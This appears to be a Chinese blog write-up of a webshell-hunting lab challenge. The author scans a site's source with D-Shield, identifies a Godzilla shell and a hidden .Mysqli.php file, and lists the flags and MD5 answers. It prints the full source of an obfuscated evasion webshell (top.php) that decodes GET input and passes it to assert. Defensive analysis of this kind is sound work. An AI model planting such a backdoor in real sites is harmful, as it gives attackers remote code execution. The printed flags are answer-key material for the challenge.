玄机--webshell查杀 | Flowww's blog

写在前面

护网要来了，好久没写博客了（滑跪）。前段时间朋友给了个号，做一波记录一下，一些语句和工具很值得学习。

黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

先把html文件夹下的源码下载到本地

1	tar -czvf src.tar.gz ./*

然后用d盾查杀一下

查看gz.php，看到flag

1	flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

黑客使用的什么工具的shell github地址的md5 flag{md5}

gz.php看的出来用的是哥斯拉的木马

1 2	https://github.com/BeichenDream/Godzilla md5:39392de3218c333f794befef07ac9257

黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

D盾看到有一个.Mysqli.php

1 2	/var/www/html/include/Db/.Mysqli.php md5:aebac0e58cd6c5fad1695ee4d1ac1919

黑客免杀马完整路径 md5 flag{md5}

d盾看到有一个top.php

<?php

$key = "password";

//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
    $fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

明显有混淆和编码

1 2	路径：/var/www/html/wap/top.php md5:eeff2eabfd9b7a6d26fc1a53d3f7d1de